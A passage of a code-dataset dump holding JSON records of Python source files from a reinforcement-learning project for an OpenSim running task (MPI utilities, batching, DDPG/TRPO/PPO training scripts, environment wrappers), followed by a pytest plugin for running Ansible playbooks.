i):\n maybe = v.get_shape()[i]\n if maybe is not None:\n return maybe\n else:\n return tf.shape(v)[i]\n\n\[email protected]_session\ndef test_probtypes():\n np.random.seed(0)\n\n pdparam_diag_gauss = np.array([-.2, .3, .4, -.5, .1, -.5, .1, 0.8])\n diag_gauss = DiagGaussianPdType(pdparam_diag_gauss.size // 2) # pylint: disable=E1101\n validate_probtype(diag_gauss, pdparam_diag_gauss)\n\n pdparam_categorical = np.array([-.2, .3, .5])\n categorical = CategoricalPdType(pdparam_categorical.size) # pylint: disable=E1101\n validate_probtype(categorical, pdparam_categorical)\n\n pdparam_bernoulli = np.array([-.2, .3, .5])\n bernoulli = BernoulliPdType(pdparam_bernoulli.size) # pylint: disable=E1101\n validate_probtype(bernoulli, pdparam_bernoulli)\n\n\ndef validate_probtype(probtype, pdparam):\n N = 100000\n # Check to see if mean negative log likelihood == differential entropy\n Mval = np.repeat(pdparam[None, :], N, axis=0)\n M = probtype.param_placeholder([N])\n X = probtype.sample_placeholder([N])\n pd = probtype.pdclass()(M)\n calcloglik = U.function([X, M], pd.logp(X))\n calcent = U.function([M], pd.entropy())\n Xval = U.eval(pd.sample(), feed_dict={M: Mval})\n logliks = calcloglik(Xval, Mval)\n entval_ll = - logliks.mean() # pylint: disable=E1101\n entval_ll_stderr = logliks.std() / np.sqrt(N) # pylint: disable=E1101\n entval = calcent(Mval).mean() # pylint: disable=E1101\n assert np.abs(entval - entval_ll) < 3 * entval_ll_stderr # within 3 sigmas\n\n # Check to see if kldiv[p,q] = - ent[p] - E_p[log q]\n M2 = probtype.param_placeholder([N])\n pd2 = probtype.pdclass()(M2)\n q = pdparam + np.random.randn(pdparam.size) * 0.1\n Mval2 = np.repeat(q[None, :], N, axis=0)\n calckl = U.function([M, M2], pd.kl(pd2))\n klval = calckl(Mval, Mval2).mean() # pylint: disable=E1101\n logliks = calcloglik(Xval, Mval2)\n klval_ll = - entval - logliks.mean() # pylint: disable=E1101\n klval_ll_stderr = logliks.std() / np.sqrt(N) # pylint: disable=E1101\n assert np.abs(klval - klval_ll) < 3 * klval_ll_stderr # within 3 sigmas\n"
},
{
"alpha_fraction": 0.516417920589447,
"alphanum_fraction": 0.5223880410194397,
"avg_line_length": 26.91666603088379,
"blob_id": "c1d30a0d340e73a1482dc96a87a657cfd3f338e3",
"content_id": "c92bc16ba7b3c95a0c6324c96c24c7157bc9df56",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 670,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 24,
"path": "/baselines/baselines_common/mpi_fork.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import os, subprocess, sys\n\n\ndef mpi_fork(n, bind_to_core=False):\n \"\"\"Re-launches the current script with workers\n Returns \"parent\" for original parent, \"child\" for MPI children\n \"\"\"\n if n <= 1:\n return \"child\"\n if os.getenv(\"IN_MPI\") is None:\n env = os.environ.copy()\n env.update(\n MKL_NUM_THREADS=\"1\",\n OMP_NUM_THREADS=\"1\",\n IN_MPI=\"1\"\n )\n args = [\"mpirun\", \"-np\", str(n)]\n if bind_to_core:\n args += [\"-bind-to\", \"core\"]\n args += [sys.executable] + sys.argv\n subprocess.check_call(args, env=env)\n return \"parent\"\n else:\n return \"child\"\n"
},
{
"alpha_fraction": 0.5974025726318359,
"alphanum_fraction": 0.6020408272743225,
"avg_line_length": 33.22222137451172,
"blob_id": "f153dcd5bafed1e02d0f501a7c6b6043e4b4862d",
"content_id": "85b5e55e8d82f66b61e6d6e2197885601542bf11",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2156,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 63,
"path": "/baselines/baselines_common/dataset.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass Dataset(object):\n def __init__(self, data_map, deterministic=False, shuffle=True):\n self.data_map = data_map\n self.deterministic = deterministic\n self.enable_shuffle = shuffle\n self.n = next(iter(data_map.values())).shape[0]\n self._next_id = 0\n self.shuffle()\n\n def shuffle(self):\n if self.deterministic:\n return\n perm = np.arange(self.n)\n np.random.shuffle(perm)\n\n for key in self.data_map:\n self.data_map[key] = self.data_map[key][perm]\n\n self._next_id = 0\n\n def next_batch(self, batch_size):\n if self._next_id >= self.n and self.enable_shuffle:\n self.shuffle()\n\n cur_id = self._next_id\n cur_batch_size = min(batch_size, self.n - self._next_id)\n self._next_id += cur_batch_size\n\n data_map = dict()\n for key in self.data_map:\n data_map[key] = self.data_map[key][cur_id:cur_id + cur_batch_size]\n return data_map\n\n def iterate_once(self, batch_size):\n if self.enable_shuffle: self.shuffle()\n\n while self._next_id <= self.n - batch_size:\n yield self.next_batch(batch_size)\n self._next_id = 0\n\n def subset(self, num_elements, deterministic=True):\n data_map = dict()\n for key in self.data_map:\n data_map[key] = self.data_map[key][:num_elements]\n return Dataset(data_map, deterministic)\n\n\ndef iterbatches(arrays, *, num_batches=None, batch_size=None, shuffle=True,\n include_final_partial_batch=True):\n assert (num_batches is None) != (\n batch_size is None), 'Provide num_batches or batch_size, but not both'\n arrays = tuple(map(np.asarray, arrays))\n n = arrays[0].shape[0]\n assert all(a.shape[0] == n for a in arrays[1:])\n inds = np.arange(n)\n if shuffle: np.random.shuffle(inds)\n sections = np.arange(0, n, batch_size)[1:] if num_batches is None else num_batches\n for batch_inds in np.array_split(inds, sections):\n if include_final_partial_batch or len(batch_inds) == batch_size:\n yield tuple(a[batch_inds] for a in arrays)\n"
},
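The `iterbatches` generator in the `dataset.py` entry above yields aligned mini-batches from parallel arrays. A minimal sketch of its behavior, assuming the function is importable from that module; the arrays and batch size below are made-up illustrative inputs:

```python
import numpy as np
# Assumes iterbatches from baselines/baselines_common/dataset.py (above) is in scope.

xs = np.arange(10)
ys = np.arange(10) * 2

# batch_size=4 over 10 rows yields batches of 4, 4, and a final partial batch of 2,
# because include_final_partial_batch defaults to True.
for bx, by in iterbatches((xs, ys), batch_size=4, shuffle=False):
    print(bx, by)
```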
{
"alpha_fraction": 0.5273295044898987,
"alphanum_fraction": 0.5590838193893433,
"avg_line_length": 33.30356979370117,
"blob_id": "6691f216717acfe73fe12ba182fdb9fa2b530756",
"content_id": "8f45846f9d8d457a1771daeea95ab3f75050db4a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3842,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 112,
"path": "/baselines/baselines_common/mpi_running_mean_std.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from mpi4py import MPI\nimport tensorflow as tf\nimport baselines.baselines_common.tf_util as U\nimport numpy as np\n\n\nclass RunningMeanStd(object):\n # https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm\n def __init__(self, epsilon=1e-2, shape=()):\n self._sum = tf.get_variable(\n dtype=tf.float64,\n shape=shape,\n initializer=tf.constant_initializer(0.0),\n name=\"runningsum\", trainable=False)\n self._sumsq = tf.get_variable(\n dtype=tf.float64,\n shape=shape,\n initializer=tf.constant_initializer(epsilon),\n name=\"runningsumsq\", trainable=False)\n self._count = tf.get_variable(\n dtype=tf.float64,\n shape=(),\n initializer=tf.constant_initializer(epsilon),\n name=\"count\", trainable=False)\n self.shape = shape\n\n self.mean = tf.to_float(self._sum / self._count)\n self.std = tf.sqrt(\n tf.maximum(tf.to_float(self._sumsq / self._count) - tf.square(self.mean), 1e-2))\n\n newsum = tf.placeholder(shape=self.shape, dtype=tf.float64, name='sum')\n newsumsq = tf.placeholder(shape=self.shape, dtype=tf.float64, name='var')\n newcount = tf.placeholder(shape=[], dtype=tf.float64, name='count')\n self.incfiltparams = U.function([newsum, newsumsq, newcount], [],\n updates=[tf.assign_add(self._sum, newsum),\n tf.assign_add(self._sumsq, newsumsq),\n tf.assign_add(self._count, newcount)])\n\n def update(self, x):\n x = x.astype('float64')\n n = int(np.prod(self.shape))\n totalvec = np.zeros(n * 2 + 1, 'float64')\n addvec = np.concatenate([x.sum(axis=0).ravel(), np.square(x).sum(axis=0).ravel(),\n np.array([len(x)], dtype='float64')])\n MPI.COMM_WORLD.Allreduce(addvec, totalvec, op=MPI.SUM)\n self.incfiltparams(totalvec[0:n].reshape(self.shape), totalvec[n:2 * n].reshape(self.shape),\n totalvec[2 * n])\n\n\[email protected]_session\ndef test_runningmeanstd():\n for (x1, x2, x3) in [\n (np.random.randn(3), np.random.randn(4), np.random.randn(5)),\n (np.random.randn(3, 2), np.random.randn(4, 2), np.random.randn(5, 2)),\n ]:\n rms = RunningMeanStd(epsilon=0.0, shape=x1.shape[1:])\n U.initialize()\n\n x = np.concatenate([x1, x2, x3], axis=0)\n ms1 = [x.mean(axis=0), x.std(axis=0)]\n rms.update(x1)\n rms.update(x2)\n rms.update(x3)\n ms2 = U.eval([rms.mean, rms.std])\n\n assert np.allclose(ms1, ms2)\n\n\[email protected]_session\ndef test_dist():\n np.random.seed(0)\n p1, p2, p3 = (np.random.randn(3, 1), np.random.randn(4, 1), np.random.randn(5, 1))\n q1, q2, q3 = (np.random.randn(6, 1), np.random.randn(7, 1), np.random.randn(8, 1))\n\n # p1,p2,p3=(np.random.randn(3), np.random.randn(4), np.random.randn(5))\n # q1,q2,q3=(np.random.randn(6), np.random.randn(7), np.random.randn(8))\n\n comm = MPI.COMM_WORLD\n assert comm.Get_size() == 2\n if comm.Get_rank() == 0:\n x1, x2, x3 = p1, p2, p3\n elif comm.Get_rank() == 1:\n x1, x2, x3 = q1, q2, q3\n else:\n assert False\n\n rms = RunningMeanStd(epsilon=0.0, shape=(1,))\n U.initialize()\n\n rms.update(x1)\n rms.update(x2)\n rms.update(x3)\n\n bigvec = np.concatenate([p1, p2, p3, q1, q2, q3])\n\n def checkallclose(x, y):\n print(x, y)\n return np.allclose(x, y)\n\n assert checkallclose(\n bigvec.mean(axis=0),\n U.eval(rms.mean)\n )\n assert checkallclose(\n bigvec.std(axis=0),\n U.eval(rms.std)\n )\n\n\nif __name__ == \"__main__\":\n # Run with mpirun -np 2 python <filename>\n test_dist()\n"
},
{
"alpha_fraction": 0.5785785913467407,
"alphanum_fraction": 0.5923423171043396,
"avg_line_length": 27.748201370239258,
"blob_id": "2c3abd679e6e1d94375481603cd447898060a493",
"content_id": "80bf6961ebf7183450f36bdfa97241cd072b8e9e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3996,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 139,
"path": "/baselines/train.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# noinspection PyUnresolvedReferences\n\nimport os\nimport json\nimport argparse\nfrom mpi4py import MPI\n\nfrom common.misc_util import boolean_flag, str2params, create_if_need\nfrom common.misc_util import set_global_seeds\nfrom common.env_wrappers import create_env\n\nfrom baselines.nets import Actor\nfrom baselines import trpo, ppo\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '--agent',\n type=str,\n default=\"trpo\",\n choices=[\"trpo\", \"ppo\"],\n help='Which agent to use. (default: %(default)s)')\n\n parser.add_argument('--seed', type=int, default=42)\n parser.add_argument('--difficulty', type=int, default=2)\n parser.add_argument('--max-obstacles', type=int, default=3)\n\n parser.add_argument('--logdir', type=str, default=\"./logs\")\n\n boolean_flag(parser, \"baseline-wrapper\", default=False)\n parser.add_argument('--skip-frames', type=int, default=1)\n parser.add_argument('--reward-scale', type=float, default=1.)\n parser.add_argument('--fail-reward', type=float, default=0.0)\n\n parser.add_argument('--hid-size', type=int, default=64)\n parser.add_argument('--num-hid-layers', type=int, default=2)\n\n parser.add_argument('--gamma', type=float, default=0.96)\n\n parser.add_argument('--restore-args-from', type=str, default=None)\n parser.add_argument('--restore-actor-from', type=str, default=None)\n\n parser.add_argument(\n '--max-train-days',\n default=int(1e1),\n type=int)\n\n args = parser.parse_args()\n return args\n\n\ndef restore_params(args):\n with open(args.restore_args_from, \"r\") as fin:\n params = json.load(fin)\n\n del params[\"seed\"]\n del params[\"difficulty\"]\n del params[\"max_obstacles\"]\n\n del params[\"skip_frames\"]\n\n del params[\"restore_args_from\"]\n del params[\"restore_actor_from\"]\n\n for key, value in params.items():\n setattr(args, key, value)\n return args\n \n\ndef train(args):\n import baselines.baselines_common.tf_util as U\n\n sess = U.single_threaded_session()\n sess.__enter__()\n\n if args.restore_args_from is not None:\n args = restore_params(args)\n\n rank = MPI.COMM_WORLD.Get_rank()\n\n workerseed = args.seed + 241 * MPI.COMM_WORLD.Get_rank()\n set_global_seeds(workerseed)\n\n def policy_fn(name, ob_space, ac_space):\n return Actor(\n name=name,\n ob_space=ob_space, ac_space=ac_space,\n hid_size=args.hid_size, num_hid_layers=args.num_hid_layers,\n noise_type=args.noise_type)\n\n env = create_env(args)\n env.seed(workerseed)\n\n if rank == 0:\n create_if_need(args.logdir)\n with open(\"{}/args.json\".format(args.logdir), \"w\") as fout:\n json.dump(vars(args), fout, indent=4, ensure_ascii=False, sort_keys=True)\n\n try:\n args.thread = rank\n if args.agent == \"trpo\":\n trpo.learn(\n env, policy_fn, args,\n timesteps_per_batch=1024,\n gamma=args.gamma,\n lam=0.98,\n max_kl=0.01,\n cg_iters=10,\n cg_damping=0.1,\n vf_iters=5,\n vf_stepsize=1e-3)\n elif args.agent == \"ppo\":\n # optimal settings:\n # timesteps_per_batch = optim_epochs * optim_batchsize\n ppo.learn(\n env, policy_fn, args,\n timesteps_per_batch=256,\n gamma=args.gamma,\n lam=0.95,\n clip_param=0.2,\n entcoeff=0.0,\n optim_epochs=4,\n optim_stepsize=3e-4,\n optim_batchsize=64,\n schedule='constant')\n else:\n raise NotImplementedError\n except KeyboardInterrupt:\n print(\"closing envs...\")\n\n env.close()\n\n\nif __name__ == '__main__':\n args = parse_args()\n args.noise_type = \"gaussian\"\n train(args)\n"
},
{
"alpha_fraction": 0.6320474743843079,
"alphanum_fraction": 0.637982189655304,
"avg_line_length": 29.636363983154297,
"blob_id": "633905b3294cec13b80301eaa9af78b14cebe962",
"content_id": "d99051634a3282451f92e945b8e9af2a1c13332b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 674,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 22,
"path": "/common/logger.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from tensorboardX import SummaryWriter\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nclass Logger(object):\n def __init__(self, log_dir, vanilla_logger=logger, skip=False):\n self.writer = SummaryWriter(log_dir)\n self.info = vanilla_logger.info\n self.debug = vanilla_logger.debug\n self.warning = vanilla_logger.warning\n self.skip = skip\n\n def scalar_summary(self, tag, value, step):\n if self.skip:\n return\n self.writer.add_scalar(tag, value, step)\n\n def histo_summary(self, tag, values, step):\n if self.skip:\n return\n self.writer.add_histogram(tag, values, step, bins=1000)\n"
},
{
"alpha_fraction": 0.6155068278312683,
"alphanum_fraction": 0.6247219443321228,
"avg_line_length": 32.12631607055664,
"blob_id": "fb4d72873b4be379c21e983a22a6b1e563cacecf",
"content_id": "1c0c13905eaaba52a24747013356a4e02a31e9b9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3147,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 95,
"path": "/common/env_wrappers.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport gym\nfrom gym.spaces import Box\nfrom osim.env import RunEnv\n\nfrom common.state_transform import StateVelCentr\n\n\nclass DdpgWrapper(gym.Wrapper):\n def __init__(self, env, args):\n gym.Wrapper.__init__(self, env)\n self.state_transform = StateVelCentr(\n obstacles_mode='standard',\n exclude_centr=True,\n vel_states=[])\n self.observation_space = Box(-1000, 1000, self.state_transform.state_size)\n self.skip_frames = args.skip_frames\n self.reward_scale = args.reward_scale\n self.fail_reward = args.fail_reward\n # [-1, 1] <-> [0, 1]\n action_mean = .5\n action_std = .5\n self.normalize_action = lambda x: (x - action_mean) / action_std\n self.denormalize_action = lambda x: x * action_std + action_mean\n\n def reset(self, **kwargs):\n return self._reset(**kwargs)\n\n def _reset(self, **kwargs):\n observation = self.env.reset(**kwargs)\n self.env_step = 0\n self.state_transform.reset()\n observation, _ = self.state_transform.process(observation)\n observation = self.observation(observation)\n return observation\n\n def _step(self, action):\n action = self.denormalize_action(action)\n total_reward = 0.\n for _ in range(self.skip_frames):\n observation, reward, done, _ = self.env.step(action)\n observation, obst_rew = self.state_transform.process(observation)\n total_reward += reward + obst_rew\n self.env_step += 1\n if done:\n if self.env_step < 1000: # hardcoded\n total_reward += self.fail_reward\n break\n\n observation = self.observation(observation)\n total_reward *= self.reward_scale\n return observation, total_reward, done, None\n\n def observation(self, observation):\n return self._observation(observation)\n\n def _observation(self, observation):\n observation = np.array(observation, dtype=np.float32)\n return observation\n\n\ndef create_env(args):\n env = RunEnv(visualize=False, max_obstacles=args.max_obstacles)\n\n if hasattr(args, \"baseline_wrapper\") or hasattr(args, \"ddpg_wrapper\"):\n env = DdpgWrapper(env, args)\n\n return env\n\n\ndef create_observation_handler(args):\n\n if hasattr(args, \"baseline_wrapper\") or hasattr(args, \"ddpg_wrapper\"):\n state_transform = StateVelCentr(\n obstacles_mode='standard',\n exclude_centr=True,\n vel_states=[])\n\n def observation_handler(observation, previous_action=None):\n observation = np.array(observation, dtype=np.float32)\n observation, _ = state_transform.process(observation)\n return observation\n else:\n def observation_handler(observation, previous_action=None):\n observation = np.array(observation, dtype=np.float32)\n return observation\n\n return observation_handler\n\n\ndef create_action_handler(args):\n action_mean = .5\n action_std = .5\n action_handler = lambda x: x * action_std + action_mean\n return action_handler\n"
},
{
"alpha_fraction": 0.6225484013557434,
"alphanum_fraction": 0.6319335699081421,
"avg_line_length": 34.067508697509766,
"blob_id": "3274f9a65ac2e62fed07893150f4d73a7ad3b22a",
"content_id": "91a528115cac5c28838911b30c303c081274a2f4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8311,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 237,
"path": "/ddpg/train.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import argparse\nimport os\nimport json\nimport copy\nimport torch\nimport torch.multiprocessing as mp\nfrom multiprocessing import Value\n\nfrom common.misc_util import boolean_flag, str2params, create_if_need\nfrom common.env_wrappers import create_env\nfrom common.torch_util import activations, hard_update\n\nfrom ddpg.model import create_model, create_act_update_fns, train_multi_thread, \\\n train_single_thread, play_single_thread\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--seed', type=int, default=42)\n parser.add_argument('--difficulty', type=int, default=2)\n parser.add_argument('--max-obstacles', type=int, default=3)\n\n parser.add_argument('--logdir', type=str, default=\"./logs\")\n parser.add_argument('--num-threads', type=int, default=1)\n parser.add_argument('--num-train-threads', type=int, default=1)\n\n boolean_flag(parser, \"ddpg-wrapper\", default=False)\n parser.add_argument('--skip-frames', type=int, default=1)\n parser.add_argument('--fail-reward', type=float, default=0.0)\n parser.add_argument('--reward-scale', type=float, default=1.)\n boolean_flag(parser, \"flip-state-action\", default=False)\n\n for agent in [\"actor\", \"critic\"]:\n parser.add_argument('--{}-layers'.format(agent), type=str, default=\"64-64\")\n parser.add_argument('--{}-activation'.format(agent), type=str, default=\"relu\")\n boolean_flag(parser, \"{}-layer-norm\".format(agent), default=False)\n boolean_flag(parser, \"{}-parameters-noise\".format(agent), default=False)\n boolean_flag(parser, \"{}-parameters-noise-factorised\".format(agent), default=False)\n\n parser.add_argument('--{}-lr'.format(agent), type=float, default=1e-3)\n parser.add_argument('--{}-lr-end'.format(agent), type=float, default=5e-5)\n\n parser.add_argument('--restore-{}-from'.format(agent), type=str, default=None)\n\n parser.add_argument('--gamma', type=float, default=0.96)\n parser.add_argument('--loss-type', type=str, default=\"quadric-linear\")\n parser.add_argument('--grad-clip', type=float, default=10.)\n\n parser.add_argument('--tau', default=0.01, type=float)\n\n parser.add_argument('--train-steps', type=int, default=int(1e4))\n parser.add_argument('--batch-size', type=int, default=256) # per worker\n\n parser.add_argument('--buffer-size', type=int, default=int(1e6))\n\n boolean_flag(parser, \"prioritized-replay\", default=False)\n parser.add_argument('--prioritized-replay-alpha', default=0.6, type=float)\n parser.add_argument('--prioritized-replay-beta0', default=0.4, type=float)\n\n parser.add_argument('--initial-epsilon', default=1., type=float)\n parser.add_argument('--final-epsilon', default=0.01, type=float)\n parser.add_argument('--max-episodes', default=int(1e4), type=int)\n parser.add_argument('--max-update-steps', default=int(5e6), type=int)\n parser.add_argument('--epsilon-cycle-len', default=int(2e2), type=int)\n\n parser.add_argument('--max-train-days', default=int(1e1), type=int)\n\n parser.add_argument('--rp-type', default=\"ornstein-uhlenbeck\", type=str)\n parser.add_argument('--rp-theta', default=0.15, type=float)\n parser.add_argument('--rp-sigma', default=0.2, type=float)\n parser.add_argument('--rp-sigma-min', default=0.15, type=float)\n parser.add_argument('--rp-mu', default=0.0, type=float)\n\n parser.add_argument('--clip-delta', type=int, default=10)\n parser.add_argument('--save-step', type=int, default=int(1e4))\n\n parser.add_argument('--restore-args-from', type=str, default=None)\n\n 
return parser.parse_args()\n\n\ndef restore_args(args):\n with open(args.restore_args_from, \"r\") as fin:\n params = json.load(fin)\n\n del params[\"seed\"]\n del params[\"difficulty\"]\n del params[\"max_obstacles\"]\n\n del params[\"logdir\"]\n del params[\"num_threads\"]\n del params[\"num_train_threads\"]\n\n del params[\"skip_frames\"]\n\n for agent in [\"actor\", \"critic\"]:\n del params[\"{}_lr\".format(agent)]\n del params[\"{}_lr_end\".format(agent)]\n del params[\"restore_{}_from\".format(agent)]\n\n del params[\"grad_clip\"]\n\n del params[\"tau\"]\n\n del params[\"train_steps\"]\n del params[\"batch_size\"]\n\n del params[\"buffer_size\"]\n\n del params[\"prioritized_replay\"]\n del params[\"prioritized_replay_alpha\"]\n del params[\"prioritized_replay_beta0\"]\n\n del params[\"initial_epsilon\"]\n del params[\"final_epsilon\"]\n del params[\"max_episodes\"]\n del params[\"max_update_steps\"]\n del params[\"epsilon_cycle_len\"]\n\n del params[\"max_train_days\"]\n\n del params[\"rp_type\"]\n del params[\"rp_theta\"]\n del params[\"rp_sigma\"]\n del params[\"rp_sigma_min\"]\n del params[\"rp_mu\"]\n\n del params[\"clip_delta\"]\n del params[\"save_step\"]\n\n del params[\"restore_args_from\"]\n\n for key, value in params.items():\n setattr(args, key, value)\n return args\n\n\ndef train(args, model_fn, act_update_fns, multi_thread, train_single, play_single):\n create_if_need(args.logdir)\n\n if args.restore_args_from is not None:\n args = restore_args(args)\n\n with open(\"{}/args.json\".format(args.logdir), \"w\") as fout:\n json.dump(vars(args), fout, indent=4, ensure_ascii=False, sort_keys=True)\n\n env = create_env(args)\n\n if args.flip_state_action and hasattr(env, \"state_transform\"):\n args.flip_states = env.state_transform.flip_states\n args.batch_size = args.batch_size // 2\n\n args.n_action = env.action_space.shape[0]\n args.n_observation = env.observation_space.shape[0]\n\n args.actor_layers = str2params(args.actor_layers)\n args.critic_layers = str2params(args.critic_layers)\n\n args.actor_activation = activations[args.actor_activation]\n args.critic_activation = activations[args.critic_activation]\n\n actor, critic = model_fn(args)\n\n if args.restore_actor_from is not None:\n actor.load_state_dict(torch.load(args.restore_actor_from))\n if args.restore_critic_from is not None:\n critic.load_state_dict(torch.load(args.restore_critic_from))\n\n actor.train()\n critic.train()\n actor.share_memory()\n critic.share_memory()\n\n target_actor = copy.deepcopy(actor)\n target_critic = copy.deepcopy(critic)\n\n hard_update(target_actor, actor)\n hard_update(target_critic, critic)\n\n target_actor.train()\n target_critic.train()\n target_actor.share_memory()\n target_critic.share_memory()\n\n _, _, save_fn = act_update_fns(actor, critic, target_actor, target_critic, args)\n\n processes = []\n best_reward = Value(\"f\", 0.0)\n try:\n if args.num_threads == args.num_train_threads:\n for rank in range(args.num_threads):\n args.thread = rank\n p = mp.Process(\n target=multi_thread,\n args=(actor, critic, target_actor, target_critic, args, act_update_fns,\n best_reward))\n p.start()\n processes.append(p)\n else:\n global_episode = Value(\"i\", 0)\n global_update_step = Value(\"i\", 0)\n episodes_queue = mp.Queue()\n for rank in range(args.num_threads):\n args.thread = rank\n if rank < args.num_train_threads:\n p = mp.Process(\n target=train_single,\n args=(actor, critic, target_actor, target_critic, args, act_update_fns,\n global_episode, global_update_step, episodes_queue))\n 
else:\n p = mp.Process(\n target=play_single,\n args=(actor, critic, target_actor, target_critic, args, act_update_fns,\n global_episode, global_update_step, episodes_queue,\n best_reward))\n p.start()\n processes.append(p)\n\n for p in processes:\n p.join()\n except KeyboardInterrupt:\n pass\n\n save_fn()\n\n\nif __name__ == '__main__':\n os.environ['OMP_NUM_THREADS'] = '1'\n torch.set_num_threads(1)\n args = parse_args()\n train(args,\n create_model,\n create_act_update_fns,\n train_multi_thread,\n train_single_thread,\n play_single_thread)\n"
},
{
"alpha_fraction": 0.5262663960456848,
"alphanum_fraction": 0.5365853905677795,
"avg_line_length": 29.457143783569336,
"blob_id": "2f274c595a23ed0d9625597f1d3857b72f7af880",
"content_id": "3c4651a6b7d337584e5ab688cb844eaa317b9fd2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1066,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 35,
"path": "/baselines/baselines_common/mpi_saver.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from mpi4py import MPI\nimport baselines.baselines_common.tf_util as U\nimport tensorflow as tf\n\n\nclass MpiSaver(object):\n def __init__(self, var_list=None, *,\n comm=None,\n log_prefix=\"/tmp\"):\n self.var_list = var_list\n self.t = 0\n\n self.saver = tf.train.Saver(\n var_list=var_list,\n max_to_keep=100,\n keep_checkpoint_every_n_hours=0.25,\n pad_step_number=True,\n save_relative_paths=True)\n self.log_prefix = log_prefix\n\n self.comm = MPI.COMM_WORLD if comm is None else comm\n\n def restore(self, restore_from=None):\n if restore_from is not None:\n self.saver.restore(U.get_session(), restore_from)\n self.t += int(restore_from.split(\"-\")[-1])\n self.sync()\n\n def sync(self):\n if self.comm.Get_rank() == 0: # this is root\n self.saver.save(\n U.get_session(),\n \"{}/model.ckpt\".format(self.log_prefix),\n global_step=self.t)\n self.t += 1\n"
}
] | 32 |
marbu/pytest-ansible-playbook
|
https://github.com/marbu/pytest-ansible-playbook
|
74172896ce89d7f17dce155f6e8f0a4192adde91
|
4a29fa61e4aceaead90e346a6fd0f04d83d593de
|
a39c0f07e6ffaf44ae2a3a5e68e6b9907da9eff0
|
refs/heads/master
| 2020-04-28T00:44:58.094346 | 2019-03-07T13:14:32 | 2019-03-07T13:14:32 | 174,827,526 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6437102556228638,
"alphanum_fraction": 0.64727783203125,
"avg_line_length": 33.11111068725586,
"blob_id": "a04157f504fab945061e47cd3bbc52ff80f71f0c",
"content_id": "97d887ffff15adf44479812c49a983dcbf95122a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6447,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 189,
"path": "/pytest_ansible_playbook.py",
"repo_name": "marbu/pytest-ansible-playbook",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nImplementation of pytest-ansible-playbook plugin.\n\"\"\"\n\n# Copyright 2016 Martin Bukatovič <[email protected]>\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom __future__ import print_function\nimport os\nimport subprocess\nimport contextlib\n\nimport pytest\n\n\ndef pytest_addoption(parser):\n \"\"\"\n Define py.test command line options for this plugin.\n \"\"\"\n group = parser.getgroup('ansible-playbook')\n group.addoption(\n '--ansible-playbook-directory',\n action='store',\n dest='ansible_playbook_directory',\n metavar=\"PLAYBOOK_DIR\",\n help='Directory where ansible playbooks are stored.',\n )\n group.addoption(\n '--ansible-playbook-inventory',\n action='store',\n dest='ansible_playbook_inventory',\n metavar=\"INVENTORY_FILE\",\n help='Ansible inventory file.',\n )\n\n\ndef pytest_configure(config):\n \"\"\"\n Validate pytest-ansible-playbook options: when such option is used,\n the given file or directory should exist.\n\n This check makes the pytest fail immediately when wrong path is\n specified, without waiting for the first test case with ansible_playbook\n fixture to fail.\n \"\"\"\n dir_path = config.getvalue('ansible_playbook_directory')\n if dir_path is not None and not os.path.isdir(dir_path):\n msg = (\n \"value of --ansible-playbook-directory option ({0}) \"\n \"is not a directory\").format(dir_path)\n raise pytest.UsageError(msg)\n inventory_path = config.getvalue('ansible_playbook_inventory')\n if inventory_path is None:\n return\n if not os.path.isabs(inventory_path) and dir_path is not None:\n inventory_path = os.path.join(dir_path, inventory_path)\n if not os.path.isfile(inventory_path):\n msg = (\n \"value of --ansible-playbook-inventory option 